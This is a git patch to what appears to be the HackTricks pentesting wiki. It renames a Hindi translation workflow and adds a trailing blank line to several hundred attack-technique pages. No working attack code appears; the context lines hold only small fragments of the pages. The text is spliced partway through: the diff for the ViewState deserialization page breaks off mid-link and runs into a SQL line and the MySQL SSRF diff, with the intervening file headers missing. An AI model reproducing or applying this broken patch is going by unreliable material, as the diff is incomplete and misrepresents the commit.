From ae1d2e8ee6991149a02373769fe43fd46045d058 Mon Sep 17 00:00:00 2001 
From: Carlos Polop
Date: Fri, 3 Jan 2025 01:05:32 +0100
Subject: [PATCH] t1
---
.github/pull_request_template.md | 1 + .github/workflows/{translate_in.yml => translate_hi.yml} | 6 +++--- src/1911-pentesting-fox.md | 1 + src/6881-udp-pentesting-bittorrent.md | 1 + .../browser-extension-pentesting-methodology/README.md | 1 + .../browext-clickjacking.md | 1 + .../browext-permissions-and-host_permissions.md | 1 + .../browext-xss-example.md | 1 + src/pentesting-web/cache-deception/README.md | 1 + .../cache-deception/cache-poisoning-to-dos.md | 1 + .../cache-poisoning-via-url-discrepancies.md | 1 + .../content-security-policy-csp-bypass/README.md | 1 + .../csp-bypass-self-+-unsafe-inline-with-iframes.md | 1 + .../dangling-markup-html-scriptless-injection/README.md | 1 + .../dangling-markup-html-scriptless-injection/ss-leaks.md | 1 + src/pentesting-web/deserialization/README.md | 1 + ...jectdataprovider-gadgets-expandedwrapper-and-json.net.md | 1 + ...sic-java-deserialization-objectinputstream-readobject.md | 1 + .../exploiting-__viewstate-knowing-the-secret.md | 1 + .../deserialization/exploiting-__viewstate-parameter.md | 1 + .../java-dns-deserialization-and-gadgetprobe.md | 1 + .../java-jsf-viewstate-.faces-deserialization.md | 1 + .../java-transformers-to-rutime-exec-payload.md | 1 + ...ndi-java-naming-and-directory-interface-and-log4shell.md | 1 + .../nodejs-proto-prototype-pollution/README.md | 1 + .../client-side-prototype-pollution.md | 1 + .../express-prototype-pollution-gadgets.md | 1 + .../prototype-pollution-to-rce.md | 1 + .../php-deserialization-+-autoload-classes.md | 1 + .../deserialization/python-yaml-deserialization.md | 1 + src/pentesting-web/deserialization/ruby-_json-pollution.md | 1 + src/pentesting-web/deserialization/ruby-class-pollution.md | 1 + src/pentesting-web/file-inclusion/README.md | 1 + ...ess.zlib-+-php_stream_prefer_studio-+-path-disclosure.md | 1 + .../file-inclusion/lfi2rce-via-eternal-waiting.md | 1 +
.../file-inclusion/lfi2rce-via-nginx-temp-files.md | 1 + .../file-inclusion/lfi2rce-via-php-filters.md | 1 + src/pentesting-web/file-inclusion/lfi2rce-via-phpinfo.md | 1 + .../file-inclusion/lfi2rce-via-segmentation-fault.md | 1 + .../file-inclusion/lfi2rce-via-temp-file-uploads.md | 1 + src/pentesting-web/file-inclusion/phar-deserialization.md | 1 + .../file-inclusion/via-php_session_upload_progress.md | 1 + src/pentesting-web/file-upload/README.md | 1 + .../file-upload/pdf-upload-xxe-and-cors-bypass.md | 1 + src/pentesting-web/hacking-with-cookies/README.md | 1 + src/pentesting-web/hacking-with-cookies/cookie-bomb.md | 1 + .../hacking-with-cookies/cookie-jar-overflow.md | 1 + src/pentesting-web/hacking-with-cookies/cookie-tossing.md | 1 + src/pentesting-web/http-connection-request-smuggling.md | 1 + src/pentesting-web/http-request-smuggling/README.md | 1 + .../browser-http-request-smuggling.md | 1 + .../request-smuggling-in-http-2-downgrades.md | 1 + src/pentesting-web/http-response-smuggling-desync.md | 1 + src/pentesting-web/idor.md | 1 + src/pentesting-web/iframe-traps.md | 1 + src/pentesting-web/ldap-injection.md | 1 + src/pentesting-web/login-bypass/README.md | 1 + src/pentesting-web/login-bypass/sql-login-bypass.md | 1 + src/pentesting-web/nosql-injection.md | 1 + src/pentesting-web/oauth-to-account-takeover.md | 1 + src/pentesting-web/open-redirect.md | 1 + src/pentesting-web/orm-injection.md | 1 + src/pentesting-web/parameter-pollution.md | 1 + src/pentesting-web/phone-number-injections.md | 1 + src/pentesting-web/pocs-and-polygloths-cheatsheet/README.md | 1 + .../pocs-and-polygloths-cheatsheet/web-vulns-list.md | 1 + src/pentesting-web/postmessage-vulnerabilities/README.md | 1 + .../blocking-main-page-to-steal-postmessage.md | 1 + .../bypassing-sop-with-iframes-1.md | 1 + .../bypassing-sop-with-iframes-2.md | 1 + .../steal-postmessage-modifying-iframe-location.md | 1 + src/pentesting-web/proxy-waf-protections-bypass.md | 1 + 
src/pentesting-web/race-condition.md | 1 + src/pentesting-web/rate-limit-bypass.md | 1 + src/pentesting-web/registration-vulnerabilities.md | 1 + .../regular-expression-denial-of-service-redos.md | 1 + src/pentesting-web/reset-password.md | 1 + src/pentesting-web/reverse-tab-nabbing.md | 1 + src/pentesting-web/saml-attacks/README.md | 1 + src/pentesting-web/saml-attacks/saml-basics.md | 1 + .../server-side-inclusion-edge-side-inclusion-injection.md | 1 + src/pentesting-web/sql-injection/README.md | 1 + src/pentesting-web/sql-injection/cypher-injection-neo4j.md | 1 + src/pentesting-web/sql-injection/ms-access-sql-injection.md | 1 + src/pentesting-web/sql-injection/mssql-injection.md | 1 + src/pentesting-web/sql-injection/mysql-injection/README.md | 1 + .../sql-injection/mysql-injection/mysql-ssrf.md | 1 + src/pentesting-web/sql-injection/oracle-injection.md | 1 + .../sql-injection/postgresql-injection/README.md | 1 + .../big-binary-files-upload-postgresql.md | 1 + .../dblink-lo_import-data-exfiltration.md | 1 + ...-port-scanner-and-ntlm-chanllenge-response-disclosure.md | 1 + .../postgresql-injection/pl-pgsql-password-bruteforce.md | 1 + .../postgresql-injection/rce-with-postgresql-extensions.md | 1 + .../postgresql-injection/rce-with-postgresql-languages.md | 1 + src/pentesting-web/sql-injection/sqlmap.md | 1 + src/pentesting-web/sql-injection/sqlmap/README.md | 1 + .../sql-injection/sqlmap/second-order-injection-sqlmap.md | 1 + .../ssrf-server-side-request-forgery/README.md | 1 + .../ssrf-server-side-request-forgery/cloud-ssrf.md | 1 + .../ssrf-vulnerable-platforms.md | 1 + .../ssrf-server-side-request-forgery/url-format-bypass.md | 1 + .../ssti-server-side-template-injection/README.md | 1 + .../el-expression-language.md | 1 + .../ssti-server-side-template-injection/jinja2-ssti.md | 1 + src/pentesting-web/timing-attacks.md | 1 + src/pentesting-web/unicode-injection/README.md | 1 + .../unicode-injection/unicode-normalization.md | 1 + 
src/pentesting-web/uuid-insecurities.md | 1 + src/pentesting-web/web-tool-wfuzz.md | 1 + src/pentesting-web/web-vulnerabilities-methodology.md | 1 + .../web-vulnerabilities-methodology/README.md | 1 + src/pentesting-web/websocket-attacks.md | 1 + src/pentesting-web/xpath-injection.md | 1 + src/pentesting-web/xs-search.md | 1 + src/pentesting-web/xs-search/README.md | 1 + .../xs-search/connection-pool-by-destination-example.md | 1 + src/pentesting-web/xs-search/connection-pool-example.md | 1 + .../xs-search/cookie-bomb-+-onerror-xs-leak.md | 1 + src/pentesting-web/xs-search/css-injection/README.md | 1 + .../xs-search/css-injection/css-injection-code.md | 1 + .../xs-search/event-loop-blocking-+-lazy-images.md | 1 + .../xs-search/javascript-execution-xs-leak.md | 1 + .../xs-search/performance.now-+-force-heavy-task.md | 1 + src/pentesting-web/xs-search/performance.now-example.md | 1 + src/pentesting-web/xs-search/url-max-length-client-side.md | 1 + ...ection-extensible-stylesheet-language-transformations.md | 1 + src/pentesting-web/xss-cross-site-scripting/README.md | 1 + .../xss-cross-site-scripting/abusing-service-workers.md | 1 + .../xss-cross-site-scripting/chrome-cache-to-xss.md | 1 + .../xss-cross-site-scripting/debugging-client-side-js.md | 1 + .../xss-cross-site-scripting/dom-clobbering.md | 1 + src/pentesting-web/xss-cross-site-scripting/dom-invader.md | 1 + src/pentesting-web/xss-cross-site-scripting/dom-xss.md | 1 + .../xss-cross-site-scripting/iframes-in-xss-and-csp.md | 1 + .../xss-cross-site-scripting/integer-overflow.md | 1 + src/pentesting-web/xss-cross-site-scripting/js-hoisting.md | 1 + .../xss-cross-site-scripting/other-js-tricks.md | 1 + .../xss-cross-site-scripting/pdf-injection.md | 1 + .../xss-cross-site-scripting/server-side-xss-dynamic-pdf.md | 1 + src/pentesting-web/xss-cross-site-scripting/shadow-dom.md | 1 + src/pentesting-web/xss-cross-site-scripting/sniff-leak.md | 1 + .../some-same-origin-method-execution.md | 1 + 
.../xss-cross-site-scripting/steal-info-js.md | 1 + .../xss-cross-site-scripting/xss-in-markdown.md | 1 + src/pentesting-web/xssi-cross-site-script-inclusion.md | 1 + src/pentesting-web/xxe-xee-xml-external-entity.md | 1 + .../escaping-from-gui-applications/README.md | 1 + src/physical-attacks/firmware-analysis/README.md | 1 + .../firmware-analysis/bootloader-testing.md | 1 + .../firmware-analysis/firmware-integrity.md | 1 + src/physical-attacks/physical-attacks.md | 1 + src/radio-hacking/README.md | 1 + src/radio-hacking/low-power-wide-area-network.md | 1 + src/radio-hacking/pentesting-ble-bluetooth-low-energy.md | 1 + src/radio-hacking/pentesting-rfid.md | 1 + .../arbitrary-write-2-exec/README.md | 1 + .../arbitrary-write-2-exec/aw2exec-__malloc_hook.md | 1 + .../arbitrary-write-2-exec/aw2exec-got-plt.md | 1 + .../aws2exec-.dtors-and-.fini_array.md | 1 + .../common-binary-protections-and-bypasses/README.md | 1 + .../common-binary-protections-and-bypasses/aslr/README.md | 1 + .../common-binary-protections-and-bypasses/aslr/ret2plt.md | 1 + .../common-binary-protections-and-bypasses/no-exec-nx.md | 1 + .../common-binary-protections-and-bypasses/pie/README.md | 1 + .../pie/bypassing-canary-and-pie.md | 1 + .../common-binary-protections-and-bypasses/relro.md | 1 + .../stack-canaries/README.md | 1 + .../stack-canaries/bf-forked-stack-canaries.md | 1 + .../stack-canaries/print-stack-canary.md | 1 + .../common-exploiting-problems.md | 1 + .../linux-exploiting-basic-esp/elf-tricks.md | 1 + .../linux-exploiting-basic-esp/format-strings/README.md | 1 + .../format-strings/format-strings-template.md | 1 + .../linux-exploiting-basic-esp/one-gadget.md | 1 + .../linux-exploiting-basic-esp/stack-overflow/README.md | 1 + .../stack-overflow/pointer-redirecting.md | 1 + .../linux-exploiting-basic-esp/stack-overflow/ret2csu.md | 1 + .../stack-overflow/ret2dlresolve.md | 1 + .../stack-overflow/ret2esp-ret2reg.md | 1 + .../stack-overflow/ret2lib/README.md | 1 + 
.../ret2lib/rop-leaking-libc-address/README.md | 1 + .../rop-leaking-libc-address/rop-leaking-libc-template.md | 1 + .../linux-exploiting-basic-esp/stack-overflow/ret2ret.md | 1 + .../linux-exploiting-basic-esp/stack-overflow/ret2win.md | 1 + .../stack-overflow/rop-return-oriented-programing.md | 1 + .../stack-overflow/rop-syscall-execv.md | 1 + .../stack-overflow/srop-sigreturn-oriented-programming.md | 1 + .../stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md | 1 + .../stack-overflow/stack-shellcode.md | 1 + src/reversing/common-api-used-in-malware.md | 1 + src/reversing/cryptographic-algorithms/README.md | 1 + .../cryptographic-algorithms/unpacking-binaries.md | 1 + src/reversing/reversing-tools-basic-methods/README.md | 1 + src/reversing/reversing-tools-basic-methods/angr/README.md | 1 + .../reversing-tools-basic-methods/angr/angr-examples.md | 1 + src/reversing/reversing-tools-basic-methods/blobrunner.md | 1 + src/reversing/reversing-tools-basic-methods/cheat-engine.md | 1 + .../satisfiability-modulo-theories-smt-z3.md | 1 + src/reversing/reversing-tools/README.md | 1 + src/reversing/reversing-tools/blobrunner.md | 1 + src/reversing/word-macros.md | 1 + src/stego/esoteric-languages.md | 1 + src/stego/stego-tricks.md | 1 + src/todo/6881-udp-pentesting-bittorrent.md | 1 + src/todo/android-forensics.md | 1 + src/todo/burp-suite.md | 1 + src/todo/cookies-policy.md | 1 + src/todo/hardware-hacking/README.md | 1 + src/todo/hardware-hacking/fault_injection_attacks.md | 1 + src/todo/hardware-hacking/i2c.md | 1 + src/todo/hardware-hacking/jtag.md | 1 + src/todo/hardware-hacking/radio.md | 1 + src/todo/hardware-hacking/side_channel_analysis.md | 1 + src/todo/hardware-hacking/spi.md | 1 + src/todo/hardware-hacking/uart.md | 1 + src/todo/industrial-control-systems-hacking/README.md | 1 + src/todo/industrial-control-systems-hacking/modbus.md | 1 + src/todo/interesting-http.md | 1 + src/todo/investment-terms.md | 1 + 
.../llm-training-data-preparation/0.-basic-llm-concepts.md | 1 + src/todo/llm-training-data-preparation/1.-tokenizing.md | 1 + src/todo/llm-training-data-preparation/2.-data-sampling.md | 1 + .../llm-training-data-preparation/3.-token-embeddings.md | 1 + .../4.-attention-mechanisms.md | 1 + .../llm-training-data-preparation/5.-llm-architecture.md | 1 + .../6.-pre-training-and-loading-models.md | 1 + .../7.0.-lora-improvements-in-fine-tuning.md | 1 + .../7.1.-fine-tuning-for-classification.md | 1 + .../7.2.-fine-tuning-to-follow-instructions.md | 1 + src/todo/llm-training-data-preparation/README.md | 1 + src/todo/misc.md | 1 + src/todo/more-tools.md | 1 + src/todo/online-platforms-with-api.md | 1 + src/todo/other-web-tricks.md | 1 + src/todo/pentesting-dns.md | 1 + src/todo/post-exploitation.md | 1 + src/todo/radio-hacking/README.md | 1 + src/todo/radio-hacking/fissure-the-rf-framework.md | 1 + src/todo/radio-hacking/flipper-zero/README.md | 1 + src/todo/radio-hacking/flipper-zero/fz-125khz-rfid.md | 1 + src/todo/radio-hacking/flipper-zero/fz-ibutton.md | 1 + src/todo/radio-hacking/flipper-zero/fz-infrared.md | 1 + src/todo/radio-hacking/flipper-zero/fz-nfc.md | 1 + src/todo/radio-hacking/flipper-zero/fz-sub-ghz.md | 1 + src/todo/radio-hacking/ibutton.md | 1 + src/todo/radio-hacking/infrared.md | 1 + src/todo/radio-hacking/low-power-wide-area-network.md | 1 + .../radio-hacking/pentesting-ble-bluetooth-low-energy.md | 1 + src/todo/radio-hacking/pentesting-rfid.md | 1 + src/todo/radio-hacking/proxmark-3.md | 1 + src/todo/radio-hacking/sub-ghz-rf.md | 1 + src/todo/references.md | 1 + src/todo/rust-basics.md | 1 + .../stealing-sensitive-information-disclosure-from-a-web.md | 1 + src/todo/test-llms.md | 1 + src/todo/tr-069.md | 1 + src/welcome/about-the-author.md | 1 + src/welcome/hacktricks-values-and-faq.md | 1 + .../active-directory-methodology/README.md | 1 + .../active-directory-methodology/abusing-ad-mssql.md | 1 + .../acl-persistence-abuse/README.md | 1 + 
.../acl-persistence-abuse/shadow-credentials.md | 1 + .../active-directory-methodology/ad-certificates.md | 1 + .../active-directory-methodology/ad-certificates/README.md | 1 + .../ad-certificates/account-persistence.md | 1 + .../ad-certificates/certificate-theft.md | 1 + .../ad-certificates/domain-escalation.md | 1 + .../ad-certificates/domain-persistence.md | 1 + .../active-directory-methodology/ad-dns-records.md | 1 + .../ad-information-in-printers.md | 1 + .../active-directory-methodology/asreproast.md | 1 + .../active-directory-methodology/bloodhound.md | 1 + .../active-directory-methodology/constrained-delegation.md | 1 + .../active-directory-methodology/custom-ssp.md | 1 + .../active-directory-methodology/dcshadow.md | 1 + .../active-directory-methodology/dcsync.md | 1 + .../active-directory-methodology/diamond-ticket.md | 1 + .../active-directory-methodology/dsrm-credentials.md | 1 + .../external-forest-domain-one-way-outbound.md | 1 + .../external-forest-domain-oneway-inbound.md | 1 + .../active-directory-methodology/golden-ticket.md | 1 + .../active-directory-methodology/kerberoast.md | 1 + .../active-directory-methodology/kerberos-authentication.md | 1 + .../kerberos-double-hop-problem.md | 1 + src/windows-hardening/active-directory-methodology/laps.md | 1 + .../over-pass-the-hash-pass-the-key.md | 1 + .../active-directory-methodology/pass-the-ticket.md | 1 + .../active-directory-methodology/password-spraying.md | 1 + .../printers-spooler-service-abuse.md | 1 + .../active-directory-methodology/printnightmare.md | 1 + .../privileged-groups-and-token-privileges.md | 1 + .../active-directory-methodology/rdp-sessions-abuse.md | 1 + .../resource-based-constrained-delegation.md | 1 + .../active-directory-methodology/security-descriptors.md | 1 + .../active-directory-methodology/sid-history-injection.md | 1 + .../active-directory-methodology/silver-ticket.md | 1 + .../active-directory-methodology/skeleton-key.md | 1 + .../unconstrained-delegation.md | 1 + 
.../authentication-credentials-uac-and-efs.md | 1 + .../authentication-credentials-uac-and-efs/README.md | 1 + .../uac-user-account-control.md | 1 + src/windows-hardening/av-bypass.md | 1 + src/windows-hardening/basic-cmd-for-pentesters.md | 1 + .../basic-powershell-for-pentesters/README.md | 1 + .../basic-powershell-for-pentesters/powerview.md | 1 + .../checklist-windows-privilege-escalation.md | 1 + src/windows-hardening/cobalt-strike.md | 1 + src/windows-hardening/lateral-movement/README.md | 1 + src/windows-hardening/lateral-movement/atexec.md | 1 + src/windows-hardening/lateral-movement/dcom-exec.md | 1 + .../lateral-movement/psexec-and-winexec.md | 1 + src/windows-hardening/lateral-movement/smbexec.md | 1 + src/windows-hardening/lateral-movement/winrm.md | 1 + src/windows-hardening/lateral-movement/wmiexec.md | 1 + src/windows-hardening/ntlm/README.md | 1 + src/windows-hardening/ntlm/atexec.md | 1 + src/windows-hardening/ntlm/places-to-steal-ntlm-creds.md | 1 + src/windows-hardening/ntlm/psexec-and-winexec.md | 1 + src/windows-hardening/ntlm/smbexec.md | 1 + src/windows-hardening/ntlm/winrm.md | 1 + src/windows-hardening/ntlm/wmiexec.md | 1 + src/windows-hardening/stealing-credentials/README.md | 1 + .../stealing-credentials/credentials-mimikatz.md | 1 + .../stealing-credentials/credentials-protections.md | 1 + .../stealing-credentials/wts-impersonator.md | 1 + .../windows-local-privilege-escalation/README.md | 1 + .../windows-local-privilege-escalation/access-tokens.md | 1 + .../acls-dacls-sacls-aces.md | 1 + ...data-addsubdirectory-permission-over-service-registry.md | 1 + .../windows-local-privilege-escalation/com-hijacking.md | 1 + .../create-msi-with-wix.md | 1 + .../windows-local-privilege-escalation/dll-hijacking.md | 1 + .../dll-hijacking/README.md | 1 + .../writable-sys-path-+dll-hijacking-privesc.md | 1 + .../dpapi-extracting-passwords.md | 1 + .../from-high-integrity-to-system-with-name-pipes.md | 1 + 
.../windows-local-privilege-escalation/integrity-levels.md | 1 + .../windows-local-privilege-escalation/juicypotato.md | 1 + .../leaked-handle-exploitation.md | 1 + .../windows-local-privilege-escalation/msi-wrapper.md | 1 + .../named-pipe-client-impersonation.md | 1 + .../privilege-escalation-abusing-tokens.md | 1 + .../privilege-escalation-abusing-tokens/README.md | 1 + .../privilege-escalation-with-autorun-binaries.md | 1 + .../roguepotato-and-printspoofer.md | 1 + .../sedebug-+-seimpersonate-copy-token.md | 1 + .../seimpersonate-from-high-to-system.md | 1 + .../windows-c-payloads.md | 1 + .../windows-security-controls/uac-user-account-control.md | 1 +
350 files changed, 352 insertions(+), 3 deletions(-)
rename .github/workflows/{translate_in.yml => translate_hi.yml} (98%)
diff --git a/.github/pull_request_template.md b/.github/pull_request_template.md
index 3f2fd0a72..68ca5efc8 100644
--- a/.github/pull_request_template.md
+++ b/.github/pull_request_template.md
@@ -8,3 +8,4 @@ Thank you for contributing to HackTricks!
+
diff --git a/.github/workflows/translate_in.yml b/.github/workflows/translate_hi.yml
similarity index 98%
rename from .github/workflows/translate_in.yml
rename to .github/workflows/translate_hi.yml
index f2a65762a..ffc58f72d 100644
--- a/.github/workflows/translate_in.yml
+++ b/.github/workflows/translate_hi.yml
@@ -1,4 +1,4 @@
-name: Translator to IN (Hindi)
+name: Translator to HI (Hindi)
 on:
 push:
@@ -10,7 +10,7 @@ on:
 - '.github/**'
 workflow_dispatch:
-concurrency: in
+concurrency: hi
 permissions:
 id-token: write
@@ -22,7 +22,7 @@ jobs:
 environment: prod
 env:
 LANGUAGE: Hindi
- BRANCH: in
+ BRANCH: hi
 steps:
 - name: Checkout code
diff --git a/src/1911-pentesting-fox.md b/src/1911-pentesting-fox.md
index 54a85f3aa..d387bf258 100644
--- a/src/1911-pentesting-fox.md
+++ b/src/1911-pentesting-fox.md
@@ -29,3 +29,4 @@ InfluxDB
 {{#include ./banners/hacktricks-training.md}}
+
diff --git a/src/6881-udp-pentesting-bittorrent.md b/src/6881-udp-pentesting-bittorrent.md
index 4ba81738b..37e73b55f 100644
--- a/src/6881-udp-pentesting-bittorrent.md
+++ b/src/6881-udp-pentesting-bittorrent.md
@@ -3,3 +3,4 @@
 {{#include ./banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/browser-extension-pentesting-methodology/README.md b/src/pentesting-web/browser-extension-pentesting-methodology/README.md
index b541ad888..774c6a701 100644
--- a/src/pentesting-web/browser-extension-pentesting-methodology/README.md
+++ b/src/pentesting-web/browser-extension-pentesting-methodology/README.md
@@ -757,3 +757,4 @@ Project Neto is a Python 3 package conceived to analyse and unravel hidden featu
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md b/src/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md
index ea330373d..9f9865589 100644
--- a/src/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md
+++ b/src/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md
@@ -101,3 +101,4 @@ browext-xss-example.md
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md b/src/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md
index cc3df2557..d376f42ed 100644
--- a/src/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md
+++ b/src/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md
@@ -113,3 +113,4 @@ However, tightening security measures often results in decreased flexibility and
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md b/src/pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md
index e37152c7a..328a19e0b 100644
--- a/src/pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md
+++ b/src/pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md
@@ -118,3 +118,4 @@ Notably, the **`/html/bookmarks.html`** page is prone to framing, thus vulnerabl
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/cache-deception/README.md b/src/pentesting-web/cache-deception/README.md
index ed0460439..7c589d1a0 100644
--- a/src/pentesting-web/cache-deception/README.md
+++ b/src/pentesting-web/cache-deception/README.md
@@ -242,3 +242,4 @@ Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request S
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/cache-deception/cache-poisoning-to-dos.md b/src/pentesting-web/cache-deception/cache-poisoning-to-dos.md
index 158968471..24e0b77e2 100644
--- a/src/pentesting-web/cache-deception/cache-poisoning-to-dos.md
+++ b/src/pentesting-web/cache-deception/cache-poisoning-to-dos.md
@@ -145,3 +145,4 @@ Cache: hit
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/cache-deception/cache-poisoning-via-url-discrepancies.md b/src/pentesting-web/cache-deception/cache-poisoning-via-url-discrepancies.md
index ea68859c1..d33a95bf0 100644
--- a/src/pentesting-web/cache-deception/cache-poisoning-via-url-discrepancies.md
+++ b/src/pentesting-web/cache-deception/cache-poisoning-via-url-discrepancies.md
@@ -52,3 +52,4 @@ Several cache servers will always cache a response if it's identified as static.
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/content-security-policy-csp-bypass/README.md b/src/pentesting-web/content-security-policy-csp-bypass/README.md
index 916ce47d0..f395dfa98 100644
--- a/src/pentesting-web/content-security-policy-csp-bypass/README.md
+++ b/src/pentesting-web/content-security-policy-csp-bypass/README.md
@@ -818,3 +818,4 @@ pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md b/src/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md
index 5c04bedaa..cdbe1d288 100644
--- a/src/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md
+++ b/src/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md
@@ -66,3 +66,4 @@ window.frames[0].document.head.appendChild(script)
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/dangling-markup-html-scriptless-injection/README.md b/src/pentesting-web/dangling-markup-html-scriptless-injection/README.md
index 328af2ee3..ef056696a 100644
--- a/src/pentesting-web/dangling-markup-html-scriptless-injection/README.md
+++ b/src/pentesting-web/dangling-markup-html-scriptless-injection/README.md
@@ -263,3 +263,4 @@ XS-Search are oriented to **exfiltrate cross-origin information** abusing **side
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/dangling-markup-html-scriptless-injection/ss-leaks.md b/src/pentesting-web/dangling-markup-html-scriptless-injection/ss-leaks.md
index 74e45ac5e..80ffd95be 100644
--- a/src/pentesting-web/dangling-markup-html-scriptless-injection/ss-leaks.md
+++ b/src/pentesting-web/dangling-markup-html-scriptless-injection/ss-leaks.md
@@ -7,3 +7,4 @@
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/deserialization/README.md b/src/pentesting-web/deserialization/README.md
index b95088891..56b471f0c 100644
--- a/src/pentesting-web/deserialization/README.md
+++ b/src/pentesting-web/deserialization/README.md
@@ -989,3 +989,4 @@ Check for more details in the [**original post**](https://github.blog/security/v
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md b/src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md
index 781fcd0b2..95d39cedd 100644
--- a/src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md
+++ b/src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md
@@ -197,3 +197,4 @@ namespace DeserializationTests
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md b/src/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md
index 79bfa3825..0ad3bf5f8 100644
--- a/src/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md
+++ b/src/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md
@@ -89,3 +89,4 @@ As you can see in this very basic example, the "vulnerability" here appears beca
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md b/src/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md
index ca88ae33e..6fc4df6ae 100644
--- a/src/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md
+++ b/src/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md
@@ -5,3 +5,4 @@
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md b/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md
index 491ee57d0..7092bd9a0 100644
--- a/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md
+++ b/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md
@@ -214,3 +214,4 @@ Check for [further information here]( select version();
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md b/src/pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md
index 58f2867b1..0c8d779ae 100644
--- a/src/pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md
+++ b/src/pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md
@@ -29,3 +29,4 @@ Automation of these processes can be facilitated by tools such as SQLMap, which
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/sql-injection/oracle-injection.md b/src/pentesting-web/sql-injection/oracle-injection.md
index 4078084cd..a2ab58517 100644
--- a/src/pentesting-web/sql-injection/oracle-injection.md
+++ b/src/pentesting-web/sql-injection/oracle-injection.md
@@ -161,3 +161,4 @@ Another package I have used in the past with varied success is the [`GETCLOB()`
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/sql-injection/postgresql-injection/README.md b/src/pentesting-web/sql-injection/postgresql-injection/README.md
index 1d5e517cb..5ad3537f9 100644
--- a/src/pentesting-web/sql-injection/postgresql-injection/README.md
+++ b/src/pentesting-web/sql-injection/postgresql-injection/README.md
@@ -91,3 +91,4 @@ SELECT $TAG$hacktricks$TAG$;
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md b/src/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md
index cdbae03f9..be4318369 100644
--- a/src/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md
+++ b/src/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md
@@ -83,3 +83,4 @@ It's noted that **large objects may have ACLs** (Access Control Lists), potentia
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration.md b/src/pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration.md
index 49c656f8f..70aedd7a5 100644
--- a/src/pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration.md
+++ b/src/pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration.md
@@ -9,3 +9,4 @@
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/sql-injection/postgresql-injection/network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md b/src/pentesting-web/sql-injection/postgresql-injection/network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md
index 13fa353ef..d211b9e21 100644
